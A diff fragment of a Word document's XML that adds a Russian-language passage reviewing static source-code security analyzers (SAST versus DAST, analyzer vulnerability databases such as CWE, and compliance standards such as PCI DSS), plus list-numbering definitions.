+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Static</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Application</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Security</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Testing</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>), также существуют методы динамического анализа — DAST (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Dynamic</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Application</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Security</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Testing</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">), </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">выполняющие проверки кода при его исполнении, и различные гибридные варианты, совмещающие разные типы анализов. Динамический анализ является самостоятельным методом проверки, который может расширять возможности статического анализа или применяться самостоятельно в тех случаях, когда доступ к исходным текстам отсутствует. В данном обзоре рассматриваются только статические анализаторы. Анализаторы встраиваемого кода и веб-приложений различаются по набору характеристик. В него входят не только качество анализа и перечень поддерживаемых программных продуктов и языков программирования, но и дополнительные механизмы: возможность осуществления автоматического исправления ошибок, наличие функций по предотвращению эксплуатации ошибок без изменений кода, возможность обновления встроенной базы уязвимостей и ошибок программирования, наличие сертификатов соответствия и возможность выполнения требований различных регуляторов.   Принципы работы анализаторов исходного кода Общие принципы работы схожи для всех классов анализаторов: и анализаторов исходного кода веб-приложений, и анализаторов встраиваемого кода. Отличие между этими типами продуктов — только в возможности определить особенности выполнения и взаимодействия кода с внешним миром, что отражается в базах уязвимостей анализаторов. Большая часть анализаторов, представленных на рынке, выполняет функции обоих классов, одинаково хорошо проверяя как встраиваемый в бизнес-приложения код, так и код веб-приложений. Входными данными для анализатора исходного кода является массив исходных текстов программ и его зависимостей (подгружаемых модулей, используемого стороннего программного обеспечения и т. д.). В качестве результатов работы все анализаторы выдают отчет об обнаруженных уязвимостях и ошибках программирования, дополнительно некоторые анализаторы предоставляют функции по автоматическому исправлению ошибок. Стоит отметить, что автоматическое исправление ошибок не </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>всегда работает корректно, поэтому данный функционал предназначен только для разработчиков веб-приложений и встраиваемых модулей, заказчик продукта должен опираться только на финальный отчет анализатора и использовать полученные данные для принятия решения по приемке и внедрению разработанного кода или отправки его на доработку.   Рисунок 1. Алгоритм работы анализатора исходных кодов</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   П</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>ри проведении оценки исходных текстов анализаторы используют различные базы данных, содержащие описание уязвимостей и ошибок программирования: Собственная база уязвимостей и ошибок программирования — у каждого разработчика анализаторов исходных кодов есть свои отделы аналитики и исследований, которые готовят специализированные базы для анализа исходных текстов программ. Качество собственной базы — один из ключевых критериев, влияющий на общее качество работы продукта. Кроме того, собственная база должна быть динамической и постоянно обновляемой — новые векторы атак и эксплуатац</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>ии уя</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">звимостей, а также изменения в языках программирования и методах разработки требуют от разработчиков анализаторов выполнять постоянные обновления базы для сохранения высокого качества проверки. Продукты со статической </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>необновляемой</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> базой чаще всего проигрывают в сравнительных тестах. Государственные базы ошибок программирования — существует ряд государственных баз уязвимостей, составлением и поддержкой которых занимаются регуляторы разных стран. К примеру, в США используется база CWE — </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Common</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Weakness</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Enumeration</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, обслуживанием которой занимается организация MITRE, </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>поддерживаемая</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> в том числе Министерством обороны США. В России пока отсутствует аналогичная база, но ФСТЭК России в будущем планирует дополнить свои базы уязвимостей и угроз базой по ошибкам программирования. Анализаторы уязвимостей реализуют поддержку базы CWE, встраивая ее в собственную базу уязвимостей или используя как отдельный механизм проверки. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Требования стандартов и рекомендации по защищенному программированию — существует как ряд государственных и отраслевых стандартов, описывающих требования к безопасной разработке </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>св</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>приложений</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, так и ряд рекомендаций и «лучших практик» от мировых экспертов в области разработки и защиты программного обеспечения. </w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Данные документы напрямую не описывают ошибки программирования, в отличие от CWE, но содержат перечень методов, которые могут быть преобразованы для использования в статическом анализаторе исходного кода. От того, какие базы используются в анализаторе, напрямую зависит качество проведения анализа, количество ложных срабатываний и пропущенных ошибок. Кроме того, анализ на соответствие требованиям регуляторов позволяет облегчить и упросить процедуру внешнего аудита инфраструктуры и информационной системы в том случае, если требования являются обязательными. К примеру, требования PCI DSS обязательны для веб-приложений и встраиваемого кода, работающего с платежной информацией по банковским картам, при этом проведение внешнего аудита по выполнению PCI DSS </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>осуществляется</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> в том числе с анализом применяемых программных продуктов.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
@@ -20083,19 +20647,317 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="2">
-    <w:nsid w:val="54BF63B5"/>
+    <w:nsid w:val="4B5255B3"/>
     <w:multiLevelType w:val="multilevel"/>
-    <w:tmpl w:val="04190021"/>
+    <w:tmpl w:val="0442CE44"/>
     <w:lvl w:ilvl="0">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
-      <w:lvlText w:val=""/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="3">
+    <w:nsid w:val="53912F4C"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="53BE25C4"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
